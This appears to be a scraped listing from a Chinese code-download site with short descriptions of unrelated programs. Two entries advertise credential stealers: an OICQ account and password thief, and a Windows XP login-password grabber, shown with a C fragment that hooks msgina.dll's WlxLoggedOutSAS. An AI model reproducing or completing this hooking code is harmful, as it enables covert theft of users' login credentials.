-
实现图形轮廓包围盒的描述。内容包括设置包围盒的线段,设置包围盒的最大最小点...
实现图形轮廓包围盒的描述。内容包括设置包围盒的线段,设置包围盒的最大最小点-Graphic description of contours bounding box. Content includes the provision of bounding box of the segment, set the minimum bounding box of the largest point
- 2022-02-13 18:15:14下载
- 积分:1
-
close all clear all clc
load datai8us.txt
load dataq8us.txt
Si = dat...
close all clear all clc
load datai8us.txt
load dataq8us.txt
Si = datai8us -j*dataq8us
filename= D:a7.dat
fid = fopen(filename, r )
Fr=10e3 v=9
TR_len = 30e6*2/Fr
TR_samp_len = 30e6/Fr*2*2*4
pluse_number = 4000
fseek(fid, 5*(30e6/Fr)*4*Fr, 0)
-close all clear all clc
load datai8us.txt
load dataq8us.txt
Si = datai8us-j*dataq8us
filename= D:a7.dat
fid = fopen(filename, r )
Fr=10e3 v=9
TR_len = 30e6*2/Fr
TR_samp_len = 30e6/Fr*2*2*4
pluse_number = 4000
fseek(fid, 5*(30e6/Fr)*4*Fr, 0)
- 2022-03-22 09:48:08下载
- 积分:1
-
自动更新
自动更新客户端代码文件 -autoupdate
- 2023-05-28 18:50:03下载
- 积分:1
-
小图象在大图象上来回的移动,可以选择不同的方式来看效果
小图象在大图象上来回的移动,可以选择不同的方式来看效果
-Small image in the image on the back and forth movement, you can choose to look at the effect of different ways
- 2022-03-25 03:16:16下载
- 积分:1
-
通过广度优先算法,遍历网络中的每个结点,得到遍历结点的时间...
通过广度优先算法,遍历网络中的每个结点,得到遍历结点的时间-Through breadth-first algorithm, network traversal each node, the node traversal time
- 2022-03-19 17:43:39下载
- 积分:1
-
窃取OICQ的用户号码及密码,同时对客户端控制。客户端控制共有8个功能。目前本人只实现其中的两个功能及“强制对话”和“关闭对话”其他留给感兴趣的读者自己实现。...
窃取OICQ的用户号码及密码,同时对客户端控制。客户端控制共有8个功能。目前本人只实现其中的两个功能及“强制对话”和“关闭对话”其他留给感兴趣的读者自己实现。
-OICQ steal user number and password, at the same time the client control. Client control functions of a total of eight. At present I will only achieve two of the function and the
- 2022-03-13 19:30:43下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
排列组合算法的函数,MAXSIZE》12时,运算量太大,PC机将无法计算。...
排列组合算法的函数,MAXSIZE》12时,运算量太大,PC机将无法计算。-Permutation and combination of function algorithm, MAXSIZE
- 2022-08-14 00:38:32下载
- 积分:1
-
ssl证书管理模块
ssl证书管理模块-ssl certificate management module
- 2022-03-05 18:43:58下载
- 积分:1
-
CRC码,这是用在网络效验方面的,最高可达到10位效验,通过该程序可在数据传输方面有一定保证。...
CRC码,这是用在网络效验方面的,最高可达到10位效验,通过该程序可在数据传输方面有一定保证。-CRC, which is used in the network of well-tested, the maximum reached 10 well-tested through the program in data transmission, there is a definite guarantee.
- 2022-08-31 19:00:04下载
- 积分:1